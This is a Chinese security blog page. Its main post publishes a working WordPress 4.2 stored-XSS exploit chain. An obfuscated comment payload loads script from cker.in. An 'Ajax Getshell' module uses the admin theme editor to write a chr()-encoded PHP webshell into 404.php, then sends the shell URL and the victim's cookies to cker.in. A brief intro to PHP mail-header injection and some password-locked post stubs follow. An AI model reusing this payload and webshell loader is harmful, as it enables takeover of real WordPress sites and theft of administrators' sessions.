WordPress 4.2 Stored Xss Exp & Xsser Platform Plugin

作者:Secer 发布时间:April 28, 2015 分类:Web安全,原创文章

 

完美payload

<abbr title="qweqw style=display:block;width:9900px;position:absolute;height:9900px;top:-100px;left:-100px; onmouseover=eval(unescape(/with%28document%290%5Bbody.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2fcker.in%2f2oPaSh%27%5D/.source))// ">

(由于博客程序处理,截断效果的此实体字符显示不出来,&#8220; ,https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/

 

匿名评论后前台触发,覆盖率全屏窗口

 

添加Xsser平台模块的接收参数:shell,用来接收getshell地址

clip_image001[1]

 

xsser平台模块代码(Ajax Getshell)

var xmlHttp;var content404,theme,_wpnonce,content ;

function createXMLHttpRequest() {

if (window.ActiveXObject) {

xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

}

else if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest();

}

}

function doRequest(url) {

createXMLHttpRequest();

xmlHttp.onreadystatechange = handleStateChange;

xmlHttp.open("GET", url, true);

xmlHttp.send(null);

}

function handleStateChange() {

if(xmlHttp.readyState == 4) {

//alert(xmlHttp.responseText)

content404 = xmlHttp.responseText;

theme = new RegExp("<input type=\"hidden\" name=\"theme\" value=\"(.+?)\" />").exec(content404)[1]

_wpnonce = new RegExp("<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"(.+?)\" />").exec(content404)[1]

content = new RegExp("(:?aria-describedby=\"newcontent-description\">)([^<]+)").exec(content404)[2]+"<script language=\"php\">fputs(fopen(chr(46).chr(47).chr(65).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(65).chr(93).chr(41).chr(59).chr(63).chr(62));</script>"

//Post code

var data = "_wpnonce="+_wpnonce+"&_wp_http_referer="+window.location.pathname+"&newcontent="+escape(content)+"&action=update&file=404.php&theme="+theme+"&scrollto=10&docs-list=&submit=submit"

doPostRequest("./wp-admin/theme-editor.php",data)

}

}

doRequest("./wp-admin/theme-editor.php?file=404.php")

function doPostRequest(url,data) {

createXMLHttpRequest();

xmlHttp.onreadystatechange = handleStateChangePost;

xmlHttp.open("POST", url, true);

xmlHttp.send(data);

}

function handleStateChangePost() {

if(xmlHttp.readyState == 4) {

//get 404

doRequest2("./index.php?p=9999999999999998888")

}

}

function doRequest2(url) {

createXMLHttpRequest();

xmlHttp.onreadystatechange = handleStateChange3;

xmlHttp.open("GET", url, true);

xmlHttp.send(null);

}

function handleStateChange3()

{

if(xmlHttp.readyState == 4) {

//(function(){(new Image).src="http://cker.in/index.php?do=api&id={projectId}&shell="+document.location.origin+document.location.pathname+"./A.php AAA"}())

//(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php') })()

(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php')+'&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})())})()

}

}

 

 

关于WordPress 4.2 Stored Xss

http://klikki.fi/adv/wordpress2.html

Proof of Concept

Enter as a comment text:

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>

此内容被密码保护

作者:Secer 发布时间:April 27, 2015 分类:渗透测试

请输入密码访问

[实战]PHP邮件注入攻击技术

作者:Secer 发布时间:April 27, 2015 分类:黑客技巧

1. 简介


如今,互联网的使用急剧上升,但绝大多数互联网用户没有安全知识背景。大多数的人都会使用互联网通过邮件Email的方式和他人进行通信。出于这个原因,大多数网站允许他们的用户联系他们,向网站提供建议,报告一个问题,或者要求反馈,用户将会发送反馈给网站管理员的电子邮件。
不幸的是,大多数web开发人员对安全编码Code-Security没有足够的认识,其中的一些程序猿使用现成的库或框架,这些库受到许多已知的漏洞。这些漏洞是已经公布,厂商并已经对其进行了修补,并且相应的攻击源代码poc都在互联网上可下载的,但大多数开发人员都懒得升级到最新版本。

今天我们要谈论电子邮件注射,攻击者可以使用你的邮件服务器来发送垃圾邮件。

2. 邮件注入


From Wikipedia:

电子邮件注入是一个安全漏洞,这种漏洞广泛存在于在互联网电子邮件收发应用中。这是电子邮件注射和HTTP头注射类似。和SQL注入攻击类似,这种漏洞是一类常见的的漏洞,发生在当一个编程语言是嵌入到另一个,例如MYSQL嵌入到PHP中。

当一个可以提交数据到一个Web应用程序表单被添加到一个Web页面,恶意用户可能会利用MIME格式添加额外的信息到要发送的消息中(POST/GET),比如一个新的收件人列表或一个完全不同的消息体。因为MIME格式使用回车分隔在数据包中信息(HTTP数据包中的每一行之间都有一个换行符,在POST和HTTP HEADER之间有两个换行符),通过添加回车提交表单数据(使用FB的一些插件可以很容易的做到),可以允许一个简单的留言板是用来发送成千上万的消息。同样,一个垃圾邮件发送者可以使用这种战术的恶意发送大量的匿名消息。

电子邮件注入是针对PHP内置邮件功能的一种攻击类型。它允许恶意攻击者注入任何邮件头字段,BCC、CC、主题等,它允许黑客通过注入手段从受害者的邮件服务器发送垃圾邮件。由于这个原因,这种攻击称为电子邮件注入,或者邮件形式滥发。这个漏洞是不限于PHP。它可能会影响任何从用户UI接收消息并发送电子邮件消息的应用程序。这种攻击的主要原因是不适当的用户输入验证或应用程序根本没有验证和过滤机制。

3. 邮件注入的攻击原理


中国古话说得好: 知其然才能知其所以然。
为了解释邮件注入的工作原理,我们必须先了解PHP Email函数的工作原理。下面是从PHP Manual中找到API解释

mail():

http://www.php.net/manual/en/function.mail.php

bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )

你可以注意到,这需要三个必填参数(”目的地、主题和消息”)和其他一些可选参数和函数返回一个布尔值。

那么让我们来看看一个带漏洞的代码来演示这个漏洞:

PHP邮件注入攻击技术

阅读剩余部分...

此内容被密码保护

作者:Secer 发布时间:April 22, 2015 分类:黑客技巧,渗透测试

请输入密码访问